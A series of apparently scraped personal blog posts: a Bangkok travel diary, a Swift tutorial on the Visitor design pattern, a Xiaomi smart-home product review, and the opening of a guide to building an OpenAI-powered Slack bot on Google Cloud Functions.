Change to the Sukhumvit Line at Siam and get off at Ari station, a short walk to LHAO LHAO restaurant.
The boss seems to be Chinese? It feels like a fusion of Chinese and Thai cuisine, a highly rated old restaurant, and it seems to be a favorite of Blackpink’s LISA.
Because I’m going to The Rock Pub for a live music session later, I had to eat quickly, but I found every dish delicious!
Recommended by Thai people, the goose brand cooling jelly, I later bought a can, it smells smoother than a mint nasal stick and is less irritating to the nasal cavity!
After dinner, head to The Rock Pub for drinks and live music.
Event of the day:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+
Rundown:
+
+• 20.00-21.00: A LIKELY LAD
+(Kings Of Leon/Blur/Arcade Fire and more)
+
+• 21.15-22.15: COUNTING DUCKS
+(Radiohead/The Strokes/The Killers and more)
+
+• 22.30-00.00 : THE CHOCOLATE COSMOS
+(Arctic Monkeys/Joy Division/The Cure/The Smiths and more)
+
+• 00.15-01.15: LIAM FT. HENSHIN
+(Oasis and more)
+
Price: THB 350 with one drink, advance ticket reservation required.
Learned a cool fact about Thailand: you can’t take photos of alcohol labels because it might be seen as promoting drinking, so you have to cover the label as shown in image 3.
Four performances, all rock and classic songs!
I’ve heard songs from: Coldplay, Radiohead, Kings of Leon, Arcade Fire, Oasis, The Killers…
We left around 23:00 as it was getting late, and the whole performance was very impressive! Whether it was the singing skills or the live performance, I thought it was great! Very talented!
After returning to the hotel to give Chun-Hsiu Liu Taiwan souvenirs, we dispersed and went back to rest.
Early in the morning, we took a Grab to have breakfast at Wang Chunsheng Beef Hot Pot. The overall taste was quite Chinese/Taiwanese style, which I thought was good, but the beef soup in Tainan was even better.
After breakfast, we went to Chatuchak Market. Since it was quite far, we didn’t feel like walking and transferring to the BTS, so we took an Uber directly there (THB 374).
👉👉👉 [**_KKday Chatuchak Market Bangkok Private Transfer Service_**](https://www.kkday.com/zh-tw/product/182142?cid=19365){:target=”_blank”}
Chatuchak Market is large with many vendors, but it’s clean and easy to shop around. However, there is a high repetition of items, and it seems like many are selling Made In China products for tourists.
In the end, I only bought a Thai brand, Phutawan indoor diffuser, as a souvenir.
When we got tired from shopping, we went into a massage shop for foot and shoulder/neck massages (1 hour/THB 250).
If you need to use the restroom at Chatuchak Market, there are paid restrooms on the outskirts (THB 5 per use). I went in and found it very clean, with one person per stall, and they were constantly being cleaned. If you prefer not to pay for the restroom, you can also go to the Mixt Chatuchak mall on the outskirts, which has free and equally clean restrooms.
Seafood Rice
Lunch was casually settled at the restaurant in Mixt Chatuchak mall, the taste was good.
After eating, we continued shopping and bought a cup of durian juice to drink, the taste was rich and real, and the price was affordable (THB 89).
Later found that things at Chatuchak were actually cheaper, for example, mint nasal sticks sold here for 6 pieces at $99, while Big C sells 6 pieces for $140… and also durian juice, sold for over $140 at the city night market.
Chatuchak is closer to MRT, but the King Power Mahanakhon Building we want to go to is at BTS Chong Nonsi station; it takes about 1 KM (15 mins) to walk from Chatuchak to the nearest BTS Saphan Khwai station.
Ticket: THB 1,080/person
Upon closer inspection, it is not as tall as imagined, but the architectural style is very unique, with a cyberpunk vibe.
Before entering, there is a security check, and after purchasing the ticket, free luggage storage is provided; backpacks are not allowed to be carried up (small waist bags are allowed).
Before taking the elevator, you can choose whether to take photos (the ticket includes a series of free digital photos, additional charge for physical photos).
Free synthesized digital photos, there will be staff guiding the download after visiting the elevator
The direct elevator has a 360-degree panoramic animation like Taipei 101 and Skytree; the height is about the same as Tokyo Tower.
Upon coming up in the elevator, you will first arrive at the indoor observation deck on the 74th floor, where there is a cafe and public seating for a short rest; to continue, take the elevator or stairs up to the 78th floor, which is the rooftop observation deck.
As soon as you arrive on the 78th floor, there is a small bar where you can order a drink and enjoy the view.
After coming out of the 78th floor, you can continue to climb up to the staircase, the rooftop resting area.
From the rooftop, you can overlook the entire Bangkok, and you can imagine that the night view should be beautiful too!
The staircase and rooftop resting area face the famous transparent glass corridor, where you can directly see the ground vertically. You can enter by taking shoe covers from the nearby box, but bringing a mobile phone is prohibited. You can ask your companions or staff for assistance in taking photos.
The entire glass corridor is not very large, about the size of a rooftop infinity pool in a hotel. It doesn’t feel very high when looking from the side, but you might still feel a bit nervous when actually walking up, feeling a bit weak in the knees. XD
MRT accepts credit card payment.
To get to Central Rama 9, you need to transfer to the MRT underground at Phra Ram 9 Station. Rabbit cards cannot be used; you need to buy tickets or now you can use a VISA card to swipe in and out.
Tested with Taishin GoGo card, not tested with Cathay Cube.
For dinner, come here to find food. I have to say that Bangkok’s night markets and bazaars outshine Taiwan by far. The overall environment is clean, with seating areas, not chaotic, well-planned, and very comfortable to stroll around.
After a stroll, I first had dessert on the left (similar to sponge cake?) and grilled seafood on the right, both with a chewy texture and quite good.
Next up is the highlight, volcano ribs, with a unique taste. The sauce has a lemongrass spicy and sour flavor. Just grab it with your hands and bite directly, very appetizing!
After eating, I bought coconut ice cream + mango + peanut dessert at another stall, also delicious!
After eating, return to Central Rama 9 for a stroll. Here, you can also find the famous NaRaYa Bangkok bags.
On the way back to the hotel, I happened to encounter the post-rain Bangkok with colorful digital advertising screens, the color contrast was maxed out, giving a very cyberpunk vibe.
On the way back to the hotel, I tried Thailand’s convenience store hot pressed toast and Thailand’s banana milk. The filling was melted cheese hot dog, and the crust was crispy! It was delicious and cheap!
Didn’t sleep well all night + hungover all day, feeling lost.
Woke up in the morning and went shopping at Central World.
As soon as I entered the first floor, there was SHAKE SHACK burger. I ordered the SHAKE SHACK signature burger and the coconut milkshake unique to Bangkok. The burger was delicious and not greasy, but I found the milkshake too sweet.
The place was huge, just like ICONSIAM. If you want to explore thoroughly, it’s endless… I bought a shirt on a whim.
After Central World, I went to Big C across the street to buy snacks and souvenirs. (There were many options, but I didn’t find them cheaper…)
Bottom left Phutawan indoor fragrance diffuser was bought at Chatuchak yesterday, but I think department stores in the city also have it.
Also, it seems that Big C no longer provides plastic bags, so you have to buy an eco-friendly bag in the store.
The durian chips come in a big pack, but when you open it, there are only two small packs… but they are quite delicious.
Outside Central World, there was a food market event at the plaza, not just simple stalls, but with a theme. This time it was Titanic-themed, and you could enter for free by following their official Youtube channel; the interior was also beautifully decorated.
Terminal 21 is a place you can never finish exploring. Each floor has a different theme, for example, the Japan section mainly sells Japanese products and restaurants.
The main purpose was to meet up with Chun-Hsiu Liu at the food street upstairs for a meal. ( Highly recommended food spot that is cheap and delicious )
At the food street, you find your own seat, and many locals also come to eat.
⚠️ Regarding payment here, the shops do not accept direct payment. You need to go to the counter first to exchange cash for a food card, then pay with the QR code on the food card; after eating, return to the counter for refund without any deposit or handling fee.
There are many choices, just queue up, state your order number, pay with the food card QR code, and you can also take away (I remember there is an additional THB 10 for packaging).
Ordered seafood stir-fried noodles (THB 50) + pork cutlet with fries (THB 59) = THB 109
After eating, also took away a box of mango sticky rice as a late-night snack back at the hotel.
It’s really delicious and cheap!!! A meal at a restaurant outside would cost at least 200-300, but here it’s mostly THB 50-80 per meal.
After eating, went to Benjakitti Park at the back to walk around and look for the legendary Bangkok giant lizard; maybe because it was night, didn’t see a single one.
⚠️Encountered a scam by foreigners on the way back to the hotel:⚠️
While waiting for the BTS on the platform…
Someone who looked like they were from the Middle East approached
- Asked if you were Thai, if you spoke English, and where you were from
- I said Taiwan
- He immediately responded, Oh… Taiwan, I love Taiwan
But from his pronunciation, I knew he had no idea about Taiwan…
- Then he said he needed to exchange money but SuperRich was closed, and asked me how many Thai baht he could get for a hundred US dollars
I felt something was off, so I just ignored him and walked away…
Their methods are all similar, either asking about your country's currency, showing curiosity, asking to see it, then while you are taking out your wallet, they either pickpocket or snatch your money and run.
Back at the hotel, a friend bought some mangosteen to taste. I found the fresh ones delicious, with a subtle sweetness and the flavor of mangosteen, very palatable. Later, we tried dried mangosteen, and the taste wasn’t as good, just dry and sour.
Regarding durians, durians in Bangkok are not cheaper… They cost around THB 200 - 300 per room.
In the morning, still curious, I specifically went to Lumphini Park to find the legendary Bangkok giant lizard. Due to time constraints, I only found a medium-sized lizard basking in the sun in the morning.
Looking for the giant lizard was just a personal, boring activity for me. Locals reportedly dislike this type of lizard (water monitor lizard), as they eat dirty things. Do not touch them casually.
The flight at 15:20, we had to leave at noon. It takes about an hour from the city to the airport.
👉👉👉 You can refer to KKday airport transfer service:
_[- Thailand Airport Private Transfer Suvarnabhumi Airport (BKK) / Don Mueang Airport (DMK) — Bangkok/Pattaya/Hua Hin City Hotels](https://www.kkday.com/zh-tw/product/3431-bkk-or-dmk-bangkok-private-transfer?cid=19365){:target=”blank”}
_[- Bangkok Airport Transfer Private Car from Bangkok City to Suvarnabhumi Airport (BKK)/Don Mueang Airport (DMK)](https://www.kkday.com/zh-tw/product/138989?cid=19365){:target=”blank”}
Grab fare from the hotel: THB 577, need to take the expressway; the driver will pay the toll first, and the Grab card fare will be adjusted later with the toll fee. (I remember it was around THB 50)
Checked baggage limit is 15 kg, managed to stay within the limit.
Bangkok’s night gatekeeper.
Departed around 13:20, Bangkok airport security is quite strict, everything needs to go through security check, and almost all carry-on bags need to be manually inspected.
Upon exiting and passing through security, there was about an hour left to grab something to eat; found a Thai restaurant and had the last meal in Thailand (seafood fried rice, mango juice, mango sticky rice).
After exiting, many shops sell take-out boxes for mango sticky rice, so you can buy some to eat on the plane if you’re still hungry!
(⚠️But remember not to bring it back to Taiwan⚠️)
This bottle of water deserves a close-up shot because the budget airline didn’t provide anything, so I thought of buying water at the airport to drink on the plane. However, the mineral water after exiting cost THB 70 - 100 per bottle, and this one was THB 100.
BKK is huge… full of Trip.com advertisements. I arrived on time for the return journey and took the shuttle to catch the flight.
Arrived at TPE Taoyuan International Airport, picked up luggage around 20:45, and went directly to take bus 1841
or 1819
of Kuo-Kuang Motor Transport back to Taipei, very convenient without the need to transfer.
Safety is the most important thing when traveling. Here are some safety and precautionary tips.
The following are summarized from a video by Bangkok Cat, and I actually encountered the money exchange/scam during this trip.
It will be banned next year, but here are some experiences to share.
1155
.Recalling some itineraries for reference, details are not available.
Digital Technology 2018 Employee Trip
_⚠️The following are all photos and records from 2018, for reference only⚠️
_⚠️The following are all photos and records from 2018, for reference only⚠️
_⚠️The following are all photos and records from 2018, for reference only⚠️
A colleague (2024) also mentioned that Bangkok has many trendy cafes, which are quite extravagant. If interested, you can check them out. This cafe had low ratings and has closed down.
Source: SHERATON HUA HIN RESORT & SPA
Only took a few photos of the hotel, one of which was a surprising photo of a millipede found in the bed upon waking up in the morning.
Seems to be a small amusement park and shopping mall with Greek-style scenery.
A quite famous attraction, still in operation in 2024.
There are many paintings and artworks.
Hotel is in villa style, each one is standalone, the swimming pool can surround every room in the hotel, there is a bar next to the pool; the outside beach is undeveloped, a desolate area.
After dinner, go to the nearby night market.
It was too early, everyone gave up and didn’t go.
👉👉👉 These two attractions are not easily accessible by public transportation, you can refer to the KKday itinerary:
**_- [Bangkok Classic Day Tour Maeklong Railway and Damnoen Saduak Floating Market | Depart from Bangkok](https://www.kkday.com/zh-tw/product/9912-maeklong-railway-damnoen-saduak-floating-market-day-tour-from-bangkok?cid=19365){:target=”blank”}**
**_[- [Thailand] Bangkok Half-Day Private Car Tour Maeklong Railway Market — Amphawa Floating Market — Amphawa Firefly Night Cruise](https://www.kkday.com/zh-tw/product/21751-maeklong-railway-market-and-amphawa-floating-market-with-firefly-night-cruise-bangkok-thailand?cid=19365){:target=”blank”}**
It was quite exciting and adventurous, even though the water was murky and had a smell.
The guide specifically told the shop not to step on the back, only remembered it was very high-end, but it hurts and can’t sleep while being massaged XD
Because I have to go to the Chao Phraya Princess River Cruise for a buffet dinner tonight, I first went shopping at the department store near the pier.
👉👉👉 Advance reservation is required, you can refer to KKday’s Chao Phraya Princess River Cruise with Dinner Buffet Thailand.
The food was decent, but the night view was beautiful, you could see the lights of the Bangkok Riverside Night Market Ferris Wheel.
After returning to the hotel, I went to the bar upstairs at the Marriott for a drink, I only remember the beautiful night view and cheap drinks.
I remember going to the department store, Big C, and Central World.
This is the hotel I stayed at this time XD
This is the memory of the 2018 employee trip. This time I revisited Bangkok on a fully independent trip, which made me more familiar with this city. Compared to my previous impression, I feel that it is more prosperous, the food is better, and the prices are higher.
— — —
Feel free to contact me for any questions or feedback.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Analysis of the practical application scenarios of the Visitor Pattern (sharing items like products, songs, articles… to Facebook, Line, Linkedin, etc.)
Photo by Daniel McCullough
From knowing about the existence of “Design Patterns” to now, it has been over 10 years, and I still can’t confidently say that I have mastered them completely. I have always been somewhat confused, and I have gone through all the patterns several times from start to finish, but if I don’t internalize them and apply them in practice, I quickly forget.
I am truly useless.
I once saw a very good analogy: the techniques part, such as PHP, Laravel, iOS, Swift, SwiftUI, etc., are relatively easy to switch between for learning, but the internal strength part, such as algorithms, data structures, design patterns, etc., are considered internal strength. There is a complementary effect between internal strength and techniques. Techniques are easy to learn, but internal strength is difficult to cultivate. Someone with excellent techniques may not have excellent internal strength, while someone with excellent internal strength can quickly learn techniques. Therefore, rather than saying they complement each other, it is better to say that internal strength is the foundation, and techniques complement it to achieve great success.
Based on my previous learning experiences, I believe that the learning method of Design Patterns that suits me best is to focus on mastering a few patterns first, internalize and flexibly apply them, develop a sense of judgment to determine which scenarios are suitable and which are not, and then gradually accumulate new patterns until mastering all of them. I think the best way is to find practical scenarios to learn from applications.
I recommend two free learning resources:
The first chapter documents the Visitor Pattern, which is one of the gold mines I dug up during my year at StreetVoice, where Visitor was widely used to solve architectural problems in the StreetVoice App. I also grasped the essence of Visitor during this experience, so let’s start with it in the first chapter!
First, please understand what Visitor is? What problems does it solve? What is its structure?
The image is from refactoringguru.
The detailed content is not repeated here. Please refer directly to refactoringguru’s explanation of Visitor first.
Assuming today we have the following models: UserModel, SongModel, PlaylistModel. Now we need to implement a sharing feature that can share to: Facebook, Line, Instagram, these three platforms. The sharing message to be displayed for each model is different, and each platform requires different data:
The combination scenario is as shown in the above image. The first table shows the customized content of each model, and the second table shows the data required by each sharing platform.
Especially when sharing a Playlist on Instagram, multiple images are required, which is different from the source required for other sharing platforms.
First, define the properties of each model:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+
// Model
+struct UserModel {
+ let id: String
+ let name: String
+ let profileImageURLString: String
+}
+
+struct SongModel {
+ let id: String
+ let name: String
+ let user: UserModel
+ let coverImageURLString: String
+}
+
+struct PlaylistModel {
+ let id: String
+ let name: String
+ let user: UserModel
+ let songs: [SongModel]
+ let coverImageURLString: String
+}
+
+// Data
+
+let user = UserModel(id: "1", name: "Avicii", profileImageURLString: "https://zhgchg.li/profile/1.png")
+
+let song = SongModel(id: "1",
+ name: "Wake me up",
+ user: user,
+ coverImageURLString: "https://zhgchg.li/cover/1.png")
+
+let playlist = PlaylistModel(id: "1",
+ name: "Avicii Tribute Concert",
+ user: user,
+ songs: [
+ song,
+ SongModel(id: "2", name: "Waiting for love", user: UserModel(id: "1", name: "Avicii", profileImageURLString: "https://zhgchg.li/profile/1.png"), coverImageURLString: "https://zhgchg.li/cover/3.png"),
+ SongModel(id: "3", name: "Lonely Together", user: UserModel(id: "1", name: "Avicii", profileImageURLString: "https://zhgchg.li/profile/1.png"), coverImageURLString: "https://zhgchg.li/cover/1.png"),
+ SongModel(id: "4", name: "Heaven", user: UserModel(id: "1", name: "Avicii", profileImageURLString: "https://zhgchg.li/profile/1.png"), coverImageURLString: "https://zhgchg.li/cover/4.png"),
+ SongModel(id: "5", name: "S.O.S", user: UserModel(id: "1", name: "Avicii", profileImageURLString: "https://zhgchg.li/profile/1.png"), coverImageURLString: "https://zhgchg.li/cover/5.png")],
+ coverImageURLString: "https://zhgchg.li/playlist/1.png")
+
Do not translate the content as it is already in English.
We have extracted a CanShare Protocol, any Model that follows this protocol can support sharing; the sharing part is also abstracted into ShareManagerProtocol. Implementing the protocol content for new sharing will not affect other ShareManagers.
However, getShareImageURLStrings is still strange. Additionally, assuming that the data for the Model requirements of a newly added sharing platform are vastly different, such as WeChat sharing requiring playback counts, creation dates, etc., and only it needs them, things will start to get messy.
Solution using the Visitor Pattern.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+80
+81
+82
+83
+84
+85
+86
+87
+88
+89
+90
+91
+92
+93
+
// Visitor Version
+protocol Shareable {
+ func accept(visitor: SharePolicy)
+}
+
+extension UserModel: Shareable {
+ func accept(visitor: SharePolicy) {
+ visitor.visit(model: self)
+ }
+}
+
+extension SongModel: Shareable {
+ func accept(visitor: SharePolicy) {
+ visitor.visit(model: self)
+ }
+}
+
+extension PlaylistModel: Shareable {
+ func accept(visitor: SharePolicy) {
+ visitor.visit(model: self)
+ }
+}
+
+protocol SharePolicy {
+ func visit(model: UserModel)
+ func visit(model: SongModel)
+ func visit(model: PlaylistModel)
+}
+
+class ShareToFacebookVisitor: SharePolicy {
+ func visit(model: UserModel) {
+ // call Facebook share sdk...
+ print("Share to Facebook...")
+ print("[](https://zhgchg.li/user/\(model.id)")
+ }
+
+ func visit(model: SongModel) {
+ // call Facebook share sdk...
+ print("Share to Facebook...")
+ print("[)](https://zhgchg.li/user/\(model.user.id)/song/\(model.id)")
+ }
+
+ func visit(model: PlaylistModel) {
+ // call Facebook share sdk...
+ print("Share to Facebook...")
+ print("[)](https://zhgchg.li/user/\(model.user.id)/playlist/\(model.id)")
+ }
+}
+
+class ShareToLineVisitor: SharePolicy {
+ func visit(model: UserModel) {
+ // call Line share sdk...
+ print("Share to Line...")
+ print("[Hi sharing a great artist \(model.name).](https://zhgchg.li/user/\(model.id)")
+ }
+
+ func visit(model: SongModel) {
+ // call Line share sdk...
+ print("Share to Line...")
+ print("[Hi sharing a great song just heard, \(model.user.name)'s \(model.name), played by him.](https://zhgchg.li/user/\(model.user.id)/song/\(model.id)")
+ }
+
+ func visit(model: PlaylistModel) {
+ // call Line share sdk...
+ print("Share to Line...")
+ print("[Hi can't stop listening to this playlist \(model.name).](https://zhgchg.li/user/\(model.user.id)/playlist/\(model.id)")
+ }
+}
+
+class ShareToInstagramVisitor: SharePolicy {
+ func visit(model: UserModel) {
+ // call Instagram share sdk...
+ print("Share to Instagram...")
+ print(model.profileImageURLString)
+ }
+
+ func visit(model: SongModel) {
+ // call Instagram share sdk...
+ print("Share to Instagram...")
+ print(model.coverImageURLString)
+ }
+
+ func visit(model: PlaylistModel) {
+ // call Instagram share sdk...
+ print("Share to Instagram...")
+ print(model.songs.map({ $0.coverImageURLString }).joined(separator: ","))
+ }
+}
+
+// Use case
+let shareToInstagramVisitor = ShareToInstagramVisitor()
+user.accept(visitor: shareToInstagramVisitor)
+playlist.accept(visitor: shareToInstagramVisitor)
+
Let’s see what we did line by line:
func accept(visitor: SharePolicy)
, so if we add a new model that supports sharing, it only needs to implement the protocol.visit(model: Shareable)
. If we do that, we will repeat the issues from the previous version.Achieving the goal of low coupling and high cohesion in software development.
The above is the classic Visitor Double Dispatch implementation. However, we rarely encounter this situation in our daily development. In general, we may only have one visitor, but I think it is also suitable to use this pattern for composition. For example, if we have a SaveToCoreData requirement today, we can directly define accept(visitor: SaveToCoreDataVisitor)
without declaring a Policy Protocol, which is also a good architectural approach.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+
protocol Saveable {
+ func accept(visitor: SaveToCoreDataVisitor)
+}
+
+class SaveToCoreDataVisitor {
+ func visit(model: UserModel) {
+ // map UserModel to coredata
+ }
+
+ func visit(model: SongModel) {
+ // map SongModel to coredata
+ }
+
+ func visit(model: PlaylistModel) {
+ // map PlaylistModel to coredata
+ }
+}
+
Other applications: Save, Like, tableview/collectionview cellforrow…
Finally, let’s talk about some common principles:
inspired by @saiday
Feel free to contact me for any questions or feedback.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
AI Speaker, Temperature and Humidity Sensor, Scale 2, DC Inverter Fan Usage Experience
Following the previous post “Smart Home First Experience — Apple HomeKit & Xiaomi Mi Home” on how to use Xiaomi smart home products; I continued to buy a few more Xiaomi home products and tried to make all home appliances smart… I can only say it’s a pitfall. Initially, I just wanted to buy a desk lamp because Xiaomi’s design is beautiful. I researched its smart features and fell into the pit!
Price: NT$ 1,495
In summary, for daily use, it’s just a Bluetooth speaker that can play music, occasionally asking Xiao Ai Speaker to remind me of the time… that’s it, actually Siri can do that; not being able to use it as a Bluetooth speaker for the computer is really painful for me, but I have to say its voice functions are really smart and impressive! You can buy it for fun.
Small item, NT$ 365
You need to buy an additional AAA battery to install; the official claims the battery life can reach one year, the round and compact design with magnetic hanging makes it convenient to take down and play with anytime, the dual-display screen allows you to quickly grasp the current temperature and humidity.
APP Temperature Record
Only supports Bluetooth connection, so if the phone is out of Bluetooth range, it cannot read the data; unless you buy a Bluetooth gateway or other Mi Home devices that support the Bluetooth gateway function.
List of devices supporting Bluetooth gateway from official documents
Generally, devices that support both WiFi and Bluetooth are supported, but Xiaomi AI Speaker does not!!
And I discovered something amazing, which is Mi Home DC Inverter Fan actually supports it, WTF!!!; so currently I use the Mi Home fan to transmit the temperature and humidity sensor information to the internet via WiFi.
It’s really weird… Xiaomi AI Speaker, desk lamp, table lamp, camera do not support the Bluetooth gateway function, but the fan does!
*Not sure if it’s only the temperature and humidity sensor that can do this
Push notifications for too high temperature or too humid messages (but these temperature and humidity levels are very normal in Taiwan…)
How to turn off:
Go to “My” -> Top right corner “Settings” -> Device notifications -> Find Mijia Bluetooth Temperature and Humidity Meter -> Turn off
After turning it off, you will no longer receive push notifications!
It’s just a scale, NT$ 395
In addition to recording weight on the app, it also has functions like weighing objects and balance tests… but it’s mainly used for weighing; it has a beautiful appearance and can enhance the quality of your home even when not in use!
The scale requires a separate Xiaomi Health app. Open the app while weighing to sync the weight records.
Xiaomi Health App
The most satisfying appliance in this purchase, NT$ 1995
The left and right swing angle is 120 degrees, which is quite large. The wind power adjustment supports 1–100 levels, allowing you to adjust the wind power as you like. My favorite is the “natural wind” mode because I like direct blowing but often feel uncomfortable after a while. This natural wind mode allows me to keep the direct blowing mode without discomfort!
It maintains Xiaomi’s simple white design. Personally, I don’t like fans that are too metallic (they feel dirty). Xiaomi fans are very light and clean, and they look comfortable even when not in use.
After adding it to the Mijia app, you can control all parameters (mode, switch, wind power, angle) from the app. You can also set periodic timing (e.g., turn off at 7:00 AM from Monday to Friday) and link with Mijia devices (e.g., automatically turn on when you get home, automatically turn on when the temperature exceeds 30 degrees) to play with smart home functions.
Additionally, I found that it can act as a Bluetooth gateway to help the Mijia Bluetooth Temperature and Humidity Meter transmit data.
*Not sure if only the temperature and humidity meter can do this
The above is a summary of the new purchases. There is still a long way to go to reach the ideal (automatically turn on the air conditioner when the temperature is too high, the fan follows people, turn on the lights when coming home, turn off the lights and turn on the camera when leaving home, turn on the dehumidifier when the humidity is too high). It is even very rugged… you need to know how to modify circuits, and I found that my dehumidifier does not have a return function, and the air conditioner is also an old model. Many Mijia devices are not sold in Taiwan (e.g., universal remote control). I originally wanted to set up a smart home, but after thinking about it, it is not very useful. Currently, I am continuing to research what else can be made smart!
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Build your own ChatGPT OpenAI API for Slack App (Google Cloud Functions & Python)
Recently, I have been promoting the use of Generative AI within the team to improve work efficiency. Initially, we only aim to achieve an AI Assistant (ChatGPT functionality) to reduce the time spent on daily data queries, organizing cumbersome data, and manual data processing, thereby improving work efficiency. We hope that engineers, designers, PMs, marketers, etc., can all use it freely.
The simplest method is to directly purchase the ChatGPT Team plan, which costs $25 per seat per year. However, since we are not yet sure about everyone’s usage frequency (volume) and hope to integrate with more collaboration and development processes in the future, we decided to use the OpenAI API method and then integrate it with other services for team members to use.
The OpenAI API Key can be generated from this page. The Key does not correspond to a specific Model version; you need to specify the Model version you want to use and generate the corresponding Token cost when using it.
We need a service that can set the OpenAI API Key by ourselves and use that Key for ChatGPT-like usage.
Whether it’s a Chrome Extension or a Slack App, it’s hard to find a service that allows you to set the OpenAI API Key by yourself. Most services sell their own subscriptions, and allowing users to set their own API Key means they can’t make money and are purely doing charity.
After installation, go to Settings -> General -> Enter the OpenAI API Key.
You can call out the chat interface directly from the browser toolbar or side icon and use it directly:
If you only need translation, you can use this, which allows you to set the OpenAI API Key for translation.
Additionally, it is an open-source project and also provides macOS/Windows desktop programs:
Chrome Extension’s advantage is its speed, simplicity, and convenience—just install and use directly. The downside is that you need to provide the API Key to all members, making it difficult to control leakage issues. Additionally, using third-party services makes it hard to ensure data security.
A colleague from the R&D department recommended this OpenAI API Chat encapsulation service. It provides authentication and almost replicates the ChatGPT interface, with more powerful features than ChatGPT, as an open-source project.
You only need the project, install Docker, set up the .env file, and start the Docker service to use it directly through the website.
Tried it out, and it’s practically flawless, just like a local version of ChatGPT service. The only downside is that it requires server deployment. If there are no other considerations, you can directly use this open-source project.
Actually, setting up the LibreChat service on a server already achieves the desired effect. However, I had a sudden thought: wouldn’t it be more convenient if it could be integrated into daily tools? Additionally, the company’s server has strict permission settings, making it difficult to start services arbitrarily.
At the time, I didn’t think much about it and assumed there would be many OpenAI API integration services for Slack App. I thought I could just find one and set it up. Unexpectedly, it wasn’t that simple.
A Google search only found an official Slack x OpenAI 2023/03 press release, “ Why we built the ChatGPT app for Slack,” and some Beta images:
https://www.salesforce.com/news/stories/chatgpt-app-for-slack/
It looks very comprehensive and could greatly improve work efficiency. However, as of 2024/01, there has been no release news. The Beta registration link provided at the end of the article is also invalid, with no further updates. (Is Microsoft trying to support Teams first?)
[2024/02/14 Update]:
Due to the lack of an official app, I turned to search for third-party developer apps. I searched and tried several but hit a wall. There were not many suitable apps, and none provided a custom Key feature. Each one was designed to sell services and make money.
Previously had some experience developing Slack Apps, decided to do it myself.
⚠️Disclaimer⚠️
This article demonstrates how to create a Slack App and quickly use Google Cloud Functions to meet the requirements by integrating the OpenAI API. There are many applications for Slack Apps, feel free to explore.
⚠️⚠️ The advantage of Google Cloud Functions, Function as a Service (FaaS), is that it is convenient and fast, with a free quota. Once the program is written, it can be deployed and executed directly, and it scales automatically. The downside is that the service environment is controlled by GCP. If the service is not called for a long time, it will go into hibernation, and calling it again will enter Cold Start, requiring a longer response time. Additionally, it is more challenging to have multiple services interact with each other.
For more complete or high-demand usage, it is recommended to set up a VM (App Engine) to run the service.
The complete Cloud Functions Python code and Slack App settings are attached at the end of the article. Those who are too lazy to follow step by step can quickly refer to it.
Go to Slack App:
Click “Create New App”
Select “From scratch”
Enter “App Name” and choose the Workspace to join.
After creation, go to “OAuth & Permissions” to add the permissions needed for the Bot.
Scroll down to find the “Scopes” section, click “Add an OAuth Scope” and add the following permissions:
After adding Bot permissions, click “Install App” on the left -> “Install to Workspace”
If the Slack App adds other permissions later, you need to click “Reinstall” again for them to take effect.
But rest assured, the Bot Token will not change due to reinstallation.
After setting up the Slack Bot Token permissions, go to “App Home”:
Scroll down to find the “Show Tabs” section, enable “Messages Tab” and “Allow users to send Slash commands and messages from the messages tab” (if this is not checked, you cannot send messages, and it will display “Sending messages to this app has been turned off.”).
Return to the Slack Workspace, press “Command+R” to refresh the screen, and you will see the newly created Slack App and message input box:
At this point, sending a message to the App has no functionality.
Next, we need to enable the event subscription feature of the Slack App, which will call the API to the specified URL when a specified event occurs.
For the Request URL part, Google Cloud Functions will come into play.
After setting up the project and billing information, click “Create Function”.
Enter the project name for Function name, and select “Allow unauthenticated invocations” for Authentication, which means that knowing the URL allows access.
If you cannot create a Function or change Authentication, it means your GCP account does not have full Google Cloud Functions permissions. You need to ask the organization administrator to add the Cloud Functions Admin permission in addition to your original role to use it.
Runtime: Python 3.8 or higher
main.py
:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+
import functions_framework
+
+@functions_framework.http
+def hello_http(request):
+ request_json = request.get_json(silent=True)
+ request_args = request.args
+ request_headers = request.headers
+
+ # You can simply use print to record runtime logs, which can be viewed in Logs
+ # For advanced Logging Level usage, refer to: https://cloud.google.com/logging/docs/reference/libraries
+ print(request_json)
+
+ # Due to the FAAS (Cloud Functions) limitation, if the service is not called for a long time, it will enter a cold start when called again, which may not respond within the 3-second limit set by Slack
+ # Additionally, the OpenAI API request takes a certain amount of time to respond (depending on the response length, it may take nearly 1 minute to complete)
+ # If Slack does not receive a response within the time limit, it will consider the request lost and will call again
+ # This can cause duplicate requests and responses, so we can set X-Slack-No-Retry: 1 in the Response Headers to inform Slack not to retry even if it does not receive a response within the time limit
+ headers = {'X-Slack-No-Retry':1}
+
+ # If it is a Slack Retry request...ignore it
+ if request_headers and 'X-Slack-Retry-Num' in request_headers:
+ return ('OK!', 200, headers)
+
+ # Slack App Event Subscriptions Verify
+ # https://api.slack.com/events/url_verification
+ if request_json and 'type' in request_json and request_json['type'] == 'url_verification':
+ challenge = ""
+ if 'challenge' in request_json:
+ challenge = request_json['challenge']
+ return (challenge, 200, headers)
+
+ return ("Access Denied!", 400, headers)
+
Enter the following dependencies in requirements.txt
:
1
+2
+3
+
functions-framework==3.*
+requests==2.31.0
+openai==1.9.0
+
